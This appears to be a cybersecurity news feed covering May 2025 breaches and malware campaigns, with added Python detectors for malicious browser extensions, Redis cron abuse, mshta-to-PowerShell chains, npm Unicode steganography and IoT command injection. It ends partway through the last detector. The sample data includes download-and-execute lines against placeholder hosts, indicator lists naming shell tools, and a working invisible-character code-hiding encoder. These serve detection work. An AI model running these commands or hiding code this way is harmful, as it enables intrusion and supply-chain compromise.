
Breaking Cyber News From Cyberint

Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.

  • May 21, 2025

    • Manufacturing
    • United States
    • North America
    • Bytebreaker
    • Facebook

    Threat Actor Claims to Have Scraped Hundreds of Millions of Facebook Records

    In May 2025, a threat actor using the alias ByteBreaker claimed to have scraped account data from Facebook. According to the actor, hundreds of millions of records belonging to Facebook users were collected, including various types of profile data, by abusing one of Facebook's APIs; a claim of this kind describes mass scraping of exposed data rather than an intrusion into Meta's infrastructure.

  • May 21, 2025

    • Telcel
    • Viralgod
    • Telecommunications
    • Latin America And The Caribbean
    • Mexico

    Threat Actor Claims Breach of Mexican Telcel

    In May 2025, a threat actor named Eternal claimed to have breached Telcel Mexico and to have gained access to its database. According to the threat actor, 10 million lines of data belonging to Telcel's customers were taken, including phone numbers, tax IDs (RFC), full names, and full addresses.

  • May 21, 2025

    • Peter Green Chilled
    • Europe
    • Transportation
    • United Kingdom

    Peter Green Chilled Halts Operations Following Ransomware Attack

    In May 2025, Peter Green Chilled became the victim of a ransomware attack in which as-yet-unidentified threat actors gained access to its systems, forcing the company to halt operations. According to Peter Green, the attack has severely disrupted its ability to process orders and manage logistics, affecting the supply of fresh products to major retailers such as Aldi, Sainsbury's, and Tesco.

  • May 21, 2025

    • Cellcom
    • Telecommunications
    • North America
    • United States

    Cellcom Confirms Cyberattack Behind Service Outages

    In May 2025, mobile carrier Cellcom became the victim of a cyberattack that caused widespread service outages and disruptions across Wisconsin and Upper Michigan. According to Cellcom, while the incident affected voice and SMS services, there is no evidence that personal information, such as names, addresses, or financial data, was compromised during the attack.

  • May 21, 2025

    • Obfuscated Files Or Information
    • Steal Web Session Cookie
    • Deobfuscate/Decode Files Or Information
    • Web Protocols
    • Time Based Evasion
    • Screen Capture
    • Browser Extensions
    • Stored Data Manipulation
    • Google Chrome
    • Exploitation For Client Execution
    • Credentials From Web Browsers
    • Drive-By Target
    • Javascript
    • Bypass User Account Control
    • Windows File And Directory Permissions Modification
    • Dns
    • Domains
    • Web Services

    Malicious Chrome Extensions Target Users with Deceptive Tactics

    A recently identified campaign, attributed to an as-yet-unknown threat actor, involves a set of malicious Chrome browser extensions that pose as legitimate tools. Active since February 2024, the extensions exfiltrate user data, execute attacker-supplied code, and perform other malicious actions such as credential theft and session hijacking. The actor stood up more than 100 fake websites that lure users into installing the extensions, which were hosted on the official Chrome Web Store; Google has since removed them. Presence on the official store is not a guarantee of safety, so the practical check is the set of permissions and host patterns an extension requests, not where it was downloaded from.
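    The capabilities described above (reading session cookies, running code in pages) are visible in an extension's manifest before it ever runs. The following is an added example, not code from the campaign or from Google: it parses a manifest.json and reports which dangerous capability combinations it grants. The sample manifest, its name, file names and the externally_connectable host are constructed placeholders.

```python
import json

# Constructed manifest for a hypothetical extension. The name, file names and the
# externally_connectable host are placeholders; nothing here is taken from the
# extensions in the campaign described above.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Privacy Shield Pro",
    "version": "1.4.2",
    "permissions": ["cookies", "storage", "scripting", "webRequest", "tabs"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"],
                         "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
    "externally_connectable": {"matches": ["https://*.example.invalid/*"]},
})

BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Word Counter", "version": "0.1",
    "permissions": ["storage", "activeTab"],
})

SEVERITY = {"high": 3, "medium": 1}


def is_broad_host(pattern):
    """True for match patterns that cover every site (or every site on a scheme)."""
    p = pattern.strip()
    if p == "<all_urls>":
        return True
    scheme, _, rest = p.partition("://")
    return scheme in ("*", "http", "https") and rest.startswith("*/")


def host_patterns(m):
    """Host patterns from MV3 host_permissions plus MV2-style entries in permissions."""
    pats = list(m.get("host_permissions", [])) + list(m.get("optional_host_permissions", []))
    pats += [p for p in m.get("permissions", []) if "://" in p or p == "<all_urls>"]
    return pats


def audit_manifest(manifest_text):
    m = json.loads(manifest_text)
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    broad = [p for p in host_patterns(m) if is_broad_host(p)]
    findings = []

    def add(sev, cap, why):
        findings.append({"severity": sev, "capability": cap, "reason": why})

    # Each finding is a capability the extension could use against the user; the
    # dangerous ones are combinations, e.g. "cookies" is harmless without host access.
    if "cookies" in perms and broad:
        add("high", "session-cookie-theft",
            "cookies + broad host access: chrome.cookies.getAll() reads session cookies for any site")
    if "scripting" in perms and broad:
        add("high", "arbitrary-script-injection",
            "scripting + broad host access: chrome.scripting.executeScript() runs code in any tab")
    if any(is_broad_host(x) for cs in m.get("content_scripts", []) for x in cs.get("matches", [])):
        add("high", "page-injection", "a content script matching every site runs in every page opened")
    if "debugger" in perms:
        add("high", "debugger-attach", "chrome.debugger can read traffic and inject into any tab")
    if perms & {"webRequest", "webRequestBlocking"}:
        add("medium", "traffic-interception", "webRequest exposes URLs and headers of matching requests")
    if "tabs" in perms and broad:
        add("medium", "browsing-surveillance", "tabs + broad hosts exposes every visited URL and title")
    if "nativeMessaging" in perms:
        add("medium", "native-host-bridge", "nativeMessaging reaches a local helper outside the sandbox")
    if m.get("externally_connectable", {}).get("matches"):
        add("medium", "web-to-extension-channel",
            "pages matching %s can message the extension and drive it"
            % m["externally_connectable"]["matches"])

    score = sum(SEVERITY[f["severity"]] for f in findings)
    return {"name": m.get("name"), "broad_hosts": broad, "findings": findings, "score": score}


if __name__ == "__main__":
    for text in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        r = audit_manifest(text)
        print(r["name"], "score", r["score"], [f["capability"] for f in r["findings"]])
```

    Installed manifests live under the profile's Extensions directory (on Windows `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>\manifest.json`, on Linux `~/.config/google-chrome/Default/Extensions/`), so the audit can be run across a fleet without involving the store at all. A high score is a reason to look at the extension's code, not proof of malice; password managers and ad blockers legitimately request several of these combinations.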

  • May 21, 2025

    • Resource Hijacking
    • System Information Discovery
    • Timestomp
    • Web Protocols
    • Cron
    • Network Service Discovery
    • Smb/Windows Admin Shares
    • United States
    • Registry Run Keys / Startup Folder
    • Remote System Discovery
    • Xmrig
    • North America
    • Ingress Tool Transfer
    • Linux And Mac File And Directory Permissions Modification
    • Redis
    • Exploit Public-Facing Application
    • Unix Shell

    New Linux Cryptojacking Campaign 'RedisRaider' Targets Exposed Redis Servers

    Cybersecurity researchers have identified a new Linux cryptojacking campaign, named RedisRaider, that targets publicly accessible Redis servers. The campaign scans the IPv4 space for exposed instances and uses legitimate Redis commands to alter the server's configuration (typically the working directory and dump file name) so that a SAVE writes attacker-controlled content into the cron spool; the injected cron job runs a base64-encoded shell script that drops a Go-based payload, which in turn deploys an XMRig miner. No software vulnerability is exploited: the technique only needs a Redis instance that accepts commands without authentication. The campaign also employs anti-forensics measures to evade detection and has been linked to a broader strategy that includes a web-based Monero miner.
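    The command sequence above leaves a distinctive trail in Redis's own command stream. As an added example (not code from the campaign or from the Redis project), the script below parses `redis-cli MONITOR` output, tracks per-client CONFIG SET dir/dbfilename changes followed by a SAVE into a cron, SSH or web directory, and decodes any `echo <b64> | base64 -d` stage in the planted value. The MONITOR lines, client addresses, key name and download URL are constructed placeholders.

```python
import base64
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output. Client addresses, the key name and the
# download URL are placeholders; this is not telemetry from the RedisRaider campaign.
STAGE_CMD = "curl -s http://example.invalid/i.sh | sh"
ENCODED_STAGE = base64.b64encode(STAGE_CMD.encode()).decode()
SAMPLE_MONITOR = rf"""1747800001.000001 [0 203.0.113.9:41000] "INFO" "server"
1747800001.000453 [0 203.0.113.9:41000] "CONFIG" "SET" "dir" "/var/spool/cron"
1747800001.000900 [0 203.0.113.9:41000] "CONFIG" "SET" "dbfilename" "root"
1747800001.001200 [0 203.0.113.9:41000] "SET" "x" "\n* * * * * echo {ENCODED_STAGE} | base64 -d | sh\n"
1747800001.001500 [0 203.0.113.9:41000] "SAVE"
1747800002.000000 [0 10.0.0.5:52000] "GET" "session:abc"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')          # one quoted MONITOR argument
# Paths where an RDB dump becomes configuration or code for another daemon.
WRITABLE_TARGETS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www")
# A five-field cron schedule, possibly after a literal "\n" that isolates it from RDB header bytes.
CRON_RE = re.compile(r'(?:^|\\n|\n)\s*(?:[\d*/,-]+\s+){5}\S')
B64_RE = re.compile(r'echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)')


def parse_monitor(text):
    """Turn MONITOR lines into {ts, client, cmd, args} records."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = ARG_RE.findall(m["rest"])
        if args:
            events.append({"ts": m["ts"], "client": m["client"],
                           "cmd": args[0].upper(), "args": args[1:]})
    return events


def decode_embedded_base64(text):
    """Decode `echo <b64> | base64 -d` stages found in a value."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:      # binascii.Error is a ValueError
            continue
    return decoded


def find_rdb_write_abuse(events):
    """Flag clients that retarget the RDB dump at a sensitive path and then trigger a dump."""
    state = defaultdict(dict)
    alerts = []
    for ev in events:
        s, cmd, args = state[ev["client"]], ev["cmd"], ev["args"]
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET" \
                and args[1].lower() in ("dir", "dbfilename"):
            s[args[1].lower()] = args[2]
        elif cmd == "SET" and len(args) >= 2 and CRON_RE.search(args[1]):
            s["payload"] = args[1]
        elif cmd in ("SAVE", "BGSAVE"):
            target = s.get("dir", "")
            if any(target.startswith(p) for p in WRITABLE_TARGETS):
                alerts.append({"client": ev["client"], "ts": ev["ts"], "dir": target,
                               "dbfilename": s.get("dbfilename"), "payload": s.get("payload"),
                               "decoded": decode_embedded_base64(s.get("payload") or "")})
    return alerts


if __name__ == "__main__":
    for a in find_rdb_write_abuse(parse_monitor(SAMPLE_MONITOR)):
        print(a["client"], "->", a["dir"] + "/" + str(a["dbfilename"]), a["decoded"])
```

    The detection is the defender's side of the same primitive; the fix is to remove it. In redis.conf, `protected-mode yes` with an explicit `bind` keeps the instance off the public interface, `requirepass` (or ACLs on Redis 6+) stops unauthenticated clients, and `rename-command CONFIG ""` removes the configuration-rewrite step entirely, which is what the cron-spool trick depends on.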

  • May 19, 2025

    • Obfuscated Files Or Information
    • Dynamic Api Resolution
    • Automated Exfiltration
    • Screen Capture
    • Powershell
    • Mshta
    • Archive Collected Data
    • Registry Run Keys / Startup Folder
    • Process Hollowing
    • Obfuscated Files Or Information: Encrypted Or Encoded Data
    • Credentials From Web Browsers
    • Ingress Tool Transfer
    • Video Capture
    • Bypass User Account Control
    • Remcos
    • Keylogging
    • Binary Padding

    New PowerShell-Based Malware Campaign Deploys Remcos RAT

    Cybersecurity researchers have uncovered a new malware campaign that uses a PowerShell-based shellcode loader to deploy the Remcos remote access trojan (RAT). The lure is a ZIP archive containing a malicious LNK file disguised as an office document; opening it runs mshta.exe against an obfuscated HTA file, which downloads and executes a PowerShell script that launches the Remcos payload entirely in memory. Remcos gives the operators full control over the compromised host, making it a potent tool for espionage and data theft. The chain is a reminder that fileless techniques leave little on disk, so detection has to come from process lineage and command-line telemetry rather than from file scanning.
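    The LNK → mshta.exe → powershell.exe chain is easier to catch than any individual file in it. As an added example (not code from the campaign or from any vendor), the script below reconstructs parent/child lineage from process-creation events in the shape of Sysmon Event ID 1, flags an HTA launched from Explorer and a PowerShell running under mshta.exe, and decodes the `-EncodedCommand` argument (base64 over UTF-16LE) so the analyst sees the script rather than a blob. The events, PIDs, paths and staging URL are constructed placeholders.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 shape, trimmed). PIDs, paths
# and the staging URL are placeholders, not telemetry from this campaign.
STAGE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENCODED_PS = base64.b64encode(STAGE_PS.encode("utf-16le")).decode()
PROCESS_EVENTS = [
    {"pid": 1200, "ppid": 800, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # HTA extracted from the lure archive and run via the LNK target (path is a placeholder)
    {"pid": 4310, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\AppData\Local\Temp\Temp1_Invoice_Q2.zip\xlab22.hta"},
    {"pid": 4388, "ppid": 4310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + ENCODED_PS},
    # Benign administrative PowerShell launched from Explorer; must not alert
    {"pid": 5000, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -ep (ExecutionPolicy) must not match.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HTA_ARG_RE = re.compile(r"(?i)\.hta\b|https?://|\\temp\\")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid, max_depth=6):
    """Image names of the parent, grandparent, ... of pid (nearest first)."""
    chain, cur = [], by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        cur = by_pid.get(cur["ppid"])
        if cur is not None:
            chain.append(basename(cur["image"]))
    return chain


def decode_encoded_command(cmdline):
    """-EncodedCommand is base64 over UTF-16LE; return the script text or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_flags(cmdline):
    flags = []
    if re.search(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden", cmdline):
        flags.append("hidden")
    if re.search(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass", cmdline):
        flags.append("bypass")
    if ENC_RE.search(cmdline):
        flags.append("encoded")
    if re.search(r"(?i)(?:^|\s)-nop(?:rofile)?\b", cmdline):
        flags.append("noprofile")
    return sorted(flags)


def detect_hta_powershell_chains(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, parents = basename(e["image"]), ancestry(e["pid"], by_pid)
        if name == "mshta.exe" and parents[:1] == ["explorer.exe"] and HTA_ARG_RE.search(e["cmdline"]):
            alerts.append({"rule": "hta_launched_from_explorer", "pid": e["pid"],
                           "cmdline": e["cmdline"]})
        if name == "powershell.exe" and "mshta.exe" in parents:
            alerts.append({"rule": "powershell_under_mshta", "pid": e["pid"], "parents": parents,
                           "flags": powershell_flags(e["cmdline"]),
                           "decoded": decode_encoded_command(e["cmdline"])})
    return alerts


if __name__ == "__main__":
    for a in detect_hta_powershell_chains(PROCESS_EVENTS):
        print(a["rule"], a["pid"], a.get("flags"), a.get("decoded") or a.get("cmdline"))
```

    Lineage is the key: a user-launched mshta.exe with a .hta argument is rare on its own, and PowerShell under mshta.exe with `-w hidden` and an encoded command is rarer still, whereas the same PowerShell flags under a legitimate management agent are routine. Environments without Sysmon get the same fields from Windows Security event 4688 with command-line auditing enabled.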

  • May 18, 2025

    • Eastern Asia
    • South Korea
    • Technology
    • Asia
    • Adidas Korea

    Adidas Korea Reports Data Breach

    In May 2025, Adidas Korea reported a data breach in which threat actors gained access to its customer database. According to Adidas, the exposed customer data included names, email addresses, phone numbers, dates of birth, and other personal details; no financial information was compromised.

  • May 18, 2025

    • Helluvahack
    • Asia
    • Israel
    • Middle East
    • Real Estate

    Threat Actor Offers For Sale Access to Israeli Real Estate Company

    On May 16th, a threat actor using the alias "HelluvaHack" offered VPN and RDP access to an Israeli real estate company for sale on forum[.]exploit[.]in for $750 in Bitcoin. The actor, who has a zero reputation score on the forum, claims the firm is based in Tel Aviv with 57 employees and $29 million in revenue. No proof or company name was provided, raising doubts about the listing's legitimacy.

  • May 18, 2025

    • Burgus Burger Bar
    • Haxorteam
    • Retail
    • Asia
    • Israel
    • Middle East

    Threat Actor Sells Data of BBB Group After Breaching Beecomm

    In May 2025, the threat actor group "HAX0RTeam" claimed to possess sensitive data stolen from the Israeli food company BBB Group, after claiming to have infiltrated the network of Beecomm, an Israeli business-services provider. The data reportedly includes 1,000,000 customer interaction recordings and 490,000 full credit card records containing card numbers, expiration dates, CVV codes, customer IDs, and phone numbers. The dataset was offered for sale for 10 BTC, with payment accepted in Bitcoin or Monero.

  • May 18, 2025

    • Business Services
    • Haxorteam
    • Beecomm
    • Asia
    • Israel
    • Middle East

    Threat Actor Group Claims Breach of Beecomm

    In May 2025, a threat actor group named "HAX0RTeam" claimed to have infiltrated the Israeli Beecomm network, gaining access to internal systems and customer data. They reported unauthorized access to the BBB Group database and exfiltration of over 1 million recorded calls containing ID card details, full credit card information, phone numbers, and personal conversations. Access to the Beecomm network was offered for sale at a price of 2 BTC, with individual customer networks to be sold separately.

  • May 18, 2025

    • Irontooth
    • United States
    • Business Services
    • North America
    • Venustech

    Threat Actor Claims to Have Breached Venus Tech

    In May 2025, a threat actor named IronTooth claimed to have breached the Chinese technology company Venustech and to have gained access to its database. According to the threat actor, a collection of internal documents was taken, including papers, details of products sold to government customers, client information, and various other sensitive materials.

  • May 18, 2025

    • Npm Package
    • Os-Info-Checker-Es6

    New Malware Campaign Disguised as NPM Package

    Cybersecurity researchers have identified a malicious npm package, 'os-info-checker-es6', that masquerades as an operating-system information utility while delivering a next-stage payload. The campaign uses Unicode-based steganography to hide code inside what looks like an ordinary string, and fetches the location of the next stage through a Google Calendar event short link, so the payload URL can be changed without republishing the package. First published on March 19, 2025, the package has been downloaded over 2,000 times; early versions showed no malicious behavior, but a later version added obfuscated code that contacts a remote server. Because the short link points at a trusted Google service, blocking by domain is impractical, and the benign-first release history means a one-time review at install time would have missed it.
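    Hiding bytes in a string that renders as a single visible character works because Unicode variation selectors are zero-width and survive copy, paste and most linters. The block below is an added example, not the package's own code: it implements one widely documented scheme (VS1..VS16 carry byte values 0..15, VS17..VS256 carry 16..255, which is assumed here and may not be the exact mapping the package used), plus a scanner that finds and decodes selector runs in a JavaScript source text. The sample module and the URL inside the hidden stage are constructed placeholders.

```python
import re

# Variation selectors are zero-width code points meant to choose a glyph variant; a run of
# them after an ordinary character renders as that one character. The byte mapping below
# (VS1..VS16 -> 0..15, VS17..VS256 -> 16..255) is an assumed scheme for illustration,
# not code lifted from the package discussed above.
VS_LOW, VS_LOW_END = 0xFE00, 0xFE0F
VS_HIGH, VS_HIGH_END = 0xE0100, 0xE01EF


def byte_to_vs(b):
    return chr(VS_LOW + b) if b < 16 else chr(VS_HIGH + (b - 16))


def vs_to_byte(ch):
    cp = ord(ch)
    if VS_LOW <= cp <= VS_LOW_END:
        return cp - VS_LOW
    if VS_HIGH <= cp <= VS_HIGH_END:
        return cp - VS_HIGH + 16
    return None


def hide(data, carrier="|"):
    """Append one variation selector per byte to a visible carrier character."""
    return carrier + "".join(byte_to_vs(b) for b in data)


def reveal(text):
    """Recover the bytes from any variation selectors in text, ignoring everything else."""
    out = bytearray()
    for ch in text:
        b = vs_to_byte(ch)
        if b is not None:
            out.append(b)
    return bytes(out)


# A legitimate emoji sequence carries at most one selector; four or more in a row is a payload.
HIDDEN_RUN_RE = re.compile("[%s-%s%s-%s]{4,}" % (chr(VS_LOW), chr(VS_LOW_END),
                                                  chr(VS_HIGH), chr(VS_HIGH_END)))


def find_hidden_payloads(source):
    """Locate and decode selector runs in a source file's text."""
    hits = []
    for m in HIDDEN_RUN_RE.finditer(source):
        hits.append({"offset": m.start(), "codepoints": m.end() - m.start(),
                     "carrier": source[m.start() - 1] if m.start() else "",
                     "decoded": reveal(m.group())})
    return hits


# Constructed module resembling a small OS-info helper with a hidden stage; the URL is a placeholder.
STAGE = b"fetch('https://calendar.app.google/PLACEHOLDER').then(r=>r.text()).then(eval)"
SAMPLE_JS = (
    "const os = require('os');\n"
    'const marker = "' + hide(STAGE) + '";\n'
    "module.exports = () => ({ platform: os.platform(), arch: os.arch() });\n"
)

if __name__ == "__main__":
    for hit in find_hidden_payloads(SAMPLE_JS):
        print("offset", hit["offset"], "carrier", repr(hit["carrier"]), hit["decoded"].decode())
```

    Run `find_hidden_payloads` over every .js file in node_modules (or in a package tarball before install) and treat any hit as a stop-the-line finding; a 70-byte string that prints as `"|"` has no legitimate reason to exist. The scanner is scheme-independent in the sense that it only looks for the selector run; only `reveal` depends on the assumed byte mapping.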

  • May 18, 2025

    • Eastern Asia
    • China
    • Education
    • Gambling
    • Technology
    • Httpbot
    • Asia
    • Tourism

    Emergence of HTTPBot: A New Threat to Gaming and Technology Industries

    Cybersecurity researchers have identified a new botnet malware, HTTPBot, that primarily targets the gaming industry, technology companies, and educational institutions in China. First detected in August 2024, HTTPBot conducts application-layer (HTTP) distributed denial-of-service (DDoS) attacks against specific targets, a shift from indiscriminate flooding toward precise business disruption. The malware hides its graphical user interface and modifies Windows registry settings so that it runs automatically at startup. Since April 2025 it has issued over 200 attack instructions, using techniques that mimic legitimate traffic in order to exhaust server resources.

  • May 15, 2025

    • Manufacturing
    • North America
    • Nucor
    • United States

    Nucor Corporation Reports Cybersecurity Incident That Halted Production

    In May 2025, Nucor Corporation became the victim of a cybersecurity incident when unauthorized third-party actors gained access to its information technology systems. According to Nucor, the attack led to considerable operational disruptions, forcing the company to temporarily suspend production at multiple facilities. While the nature and scope of the cyberattack remain undisclosed, it is unclear whether any customer data was exposed or stolen during the breach.

  • May 15, 2025

    • System Information Discovery
    • Spearphishing Attachment
    • Web Protocols
    • Powershell
    • Malicious File
    • Email Collection
    • Horabot
    • Visual Basic
    • Chile
    • Screen Capture
    • Colombia
    • Latin America And The Caribbean
    • Mexico
    • Os Credential Dumping
    • Windows Command Shell
    • Peru
    • Credentials From Web Browsers
    • Argentina
    • Email Forwarding Rule
    • Guatemala

    New Phishing Campaign Distributing Horabot Malware in Latin America

    Cybersecurity researchers have uncovered a phishing campaign distributing malware known as Horabot, primarily targeting Windows users in Latin American countries such as Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. The campaign utilizes crafted emails that mimic invoices or financial documents to deceive victims into opening malicious attachments, which can steal email credentials, harvest contact lists, and install banking trojans. The attacks, observed in April 2025, leverage automation to send phishing messages from victims' mailboxes and execute various scripts to conduct reconnaissance and steal credentials. Horabot has been active since at least November 2020 and is believed to be operated by a threat actor from Brazil.

  • May 13, 2025

    • Israel Internet Association (ISOC-IL)
    • Business Services
    • Haxorteam
    • Asia
    • Israel
    • Middle East

    Threat Actor Sells Access to Israel's Internet Exchange (IIX)

    In May 2025, a threat actor group named "HAX0RTeam" claimed to be selling access to Israel’s Internet Exchange (IIX) network for $150,000. According to the listing, the access could enable interception of sensitive communications, traffic manipulation, data theft, malware injection, targeted attacks, and disruption of critical infrastructure. Payment options included Bitcoin and Monero, with escrow services accepted.

  • May 13, 2025

    • Finance
    • Telecommunications
    • Education
    • Latin America And The Caribbean
    • Government
    • Mexico
    • Eternal

    Threat Actor Offers Data From Mexican Companies

    In May 2025, a threat actor named "Eternal" claimed to be selling a 200+ GB compilation of private databases from Mexico, containing billions of records. The data reportedly includes electoral records from INE (2008–2019), customer information from major banks such as BBVA, Banamex, and HSBC, Telcel and Telmex telephony data, WhatsApp active numbers in Mexico, university and retail databases, energy company data, and records from government institutions and political party affiliates. The compilation was listed for sale at $5,000 USD.

  • May 13, 2025

    • Iraq
    • CVE-2025-27920
    • Sea Turtle
    • Asia
    • Middle East
    • Kurdistan

    Marbled Dust Exploits Zero-Day in Indian Communication Platform for Espionage

    A Türkiye-affiliated threat actor, known as Marbled Dust, has exploited a zero-day vulnerability in the Indian enterprise communication platform Output Messenger as part of a cyber espionage campaign targeting Kurdish military personnel in Iraq since April 2024. The vulnerability, identified as CVE-2025-27920, allows remote attackers to access arbitrary files and has been linked to a series of data exfiltration activities. Microsoft reported that the threat actor uses sophisticated techniques, including DNS hijacking, to gain access to user credentials and deploy malicious payloads, indicating an escalation in their operational capabilities.

  • May 13, 2025

    • Noodlophile
    • Xworm

    New AI-Themed Malware Campaign Distributes 'Noodlophile' Infostealer via Fake Video Tools

    A new malware campaign is distributing an information-stealing malware named "Noodlophile" through fake AI-powered video generation sites advertised on Facebook with names like "Dream Machine." These malicious sites trick users into downloading a ZIP archive that contains a disguised executable file posing as a video, which initiates a multi-stage infection process using legitimate tools like "CapCut," "certutil.exe," and Registry modifications for persistence. The final payload, "Noodlophile," exfiltrates browser credentials, session cookies, and cryptocurrency wallets via a Telegram bot and can be bundled with "XWorm" for enhanced remote access. The campaign appears to be linked to Vietnamese-speaking operators offering malware-as-a-service.

  • May 12, 2025

    • Mag
    • Gatito_Fbi_Nz
    • Latin America And The Caribbean
    • Business Services
    • Paraguay

    Threat Actor Claims Breach of Paraguay's Ministry of Agriculture

    In May 2025, a threat actor named Gatito_FBI_Nz claimed to have breached the Ministry of Agriculture in Paraguay and to have gained access to its database. According to the threat actor, 1,414 records belonging to the ministry's suppliers were taken, including sensitive information such as usernames and passwords.

  • May 11, 2025

    • Business Services
    • Dooble
    • Fedayeen Hackers
    • Asia
    • Israel
    • Middle East

    Fedayeen Hackers Claim Cyberattack on Israeli Firm Dooble Digital Solutions

    On May 9, 2025, hacktivist group Fedayeen Hackers claimed responsibility for a cyberattack on Israeli software company Dooble Digital Solutions. The group alleges it exfiltrated source code, client credentials, internal documents, and other sensitive assets, including data linked to Israeli companies. A partial data leak was shared as proof, though Dooble has not confirmed the breach, and the authenticity of the claims remains unverified. The attack is part of a broader campaign by the group targeting Israeli digital infrastructure since early 2025.

  • May 08, 2025

    • Avid Technology
    • United States
    • Business Services
    • North America
    • Betway

    Threat Actor Sells Data Belonging to Avid CRM

    In May 2025, a threat actor named "betway" claimed to have breached Avid.com, a U.S.-based media technology company with over $294.1 million in revenue. The threat actor stated they exfiltrated over 10 million rows of user data, including contact information, job titles, addresses, phone numbers, emails, account details, and internal CRM metadata. The dataset was listed for public sale with an asking price starting at $40,000.

  • May 08, 2025

    • Eastern Asia
    • Pr Times
    • Business Services
    • Japan
    • Asia

    PR Times Reports Data Breach - Exposing Data of 900K

    In May 2025, PR TIMES reported that it had become the victim of a data breach when threat actors gained access to its database. According to PR TIMES, over 900,000 records belonging to customers were taken, including personal information of enterprise, media, and individual users as well as sensitive pre-release press materials. The breach occurred on April 24th, 2025.

  • May 08, 2025

    • Manufacturing
    • Eastern Asia
    • Im Corporation
    • Japan
    • Asia
    • Blf0Ty

    Threat Actor Claims to Have Breached IM Corporation, a Japanese Manufacturing Company

    In May 2025, a threat actor named BLF0ty claimed to have breached im-eng.jp and to have gained access to its database. According to the threat actor, 1.88 GB of data belonging to im-eng.jp's customers was taken, including information related to hydraulic cylinder design and the manufacturing and processing of automobile parts.

  • May 07, 2025

    • Manufacturing
    • Eastern Asia
    • CVE-2018-10561
    • CVE-2024-11120
    • Mirai
    • CVE-2024-6047
    • Asia
    • Geovision
    • Taiwan

    Exploitation of Geovision IoT Devices by Mirai Botnet

    Threat actors are actively exploiting vulnerabilities in end-of-life Geovision IoT devices to recruit them into a Mirai botnet used for distributed denial-of-service (DDoS) attacks. The flaws are command injections that let an attacker execute arbitrary system commands, with the malicious requests targeting the /datesetting.cgi endpoint. Because the devices are end-of-life and will not receive firmware fixes, users are advised to replace them with supported models; until then, a device that must stay in service should at minimum be kept off the public internet, with its management interface reachable only from a trusted network.
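    When a device cannot be patched, the remaining control is to see the exploitation attempts. The following is an added example, not code from the Mirai variant or from Geovision: it parses a simple request log, URL-decodes query and form parameters, and flags requests to the CGI endpoint whose parameter values contain shell metacharacters or the download-and-execute tooling a Mirai dropper needs. The log format, IP addresses and parameter names (szTime, szZone) are constructed placeholders; the parameter actually abused in the Geovision flaw is not reproduced here.

```python
import re
from urllib.parse import unquote_plus, urlencode

# Constructed request records (ip, timestamp, method, path, body), tab-separated, one per
# line. Parameter names, addresses and the injected commands are placeholders; the
# parameter actually abused in the Geovision flaw is not reproduced here.
INJECTED_BODY = urlencode({"szTime": "2025-05-07;wget http://198.51.100.23/arm7 -O /tmp/x;"
                                     "chmod 777 /tmp/x;/tmp/x"})
BENIGN_BODY = urlencode({"szTime": "2025-05-07", "szZone": "UTC"})
SAMPLE_LOG = "\n".join([
    "203.0.113.77\t2025-05-07T10:01:02Z\tPOST\t/datesetting.cgi\t" + INJECTED_BODY,
    "198.51.100.9\t2025-05-07T10:02:10Z\tPOST\t/datesetting.cgi\t" + BENIGN_BODY,
    "203.0.113.77\t2025-05-07T10:03:15Z\tGET\t/datesetting.cgi?szTime=%24%28id%29\t-",
    "10.0.0.4\t2025-05-07T10:04:00Z\tGET\t/index.html?q=a%3Bb\t-",
])

# Shell metacharacters, plus the tooling a Mirai dropper needs once it has a shell.
INDICATORS = [
    (";", r";"), ("|", r"\|"), ("&&", r"&&"), ("`", r"`"), ("$(", r"\$\("),
    ("wget", r"\bwget\b"), ("curl", r"\bcurl\b"), ("tftp", r"\btftp\b"),
    ("chmod", r"\bchmod\b"), ("/tmp/", r"/tmp/"), ("busybox", r"\bbusybox\b"),
]
INDICATOR_RES = [(label, re.compile(pat)) for label, pat in INDICATORS]


def parse_params(encoded):
    """Split an application/x-www-form-urlencoded string. Done by hand rather than with
    parse_qsl because parse_qsl's treatment of ';' as a separator changed across Python versions."""
    params = {}
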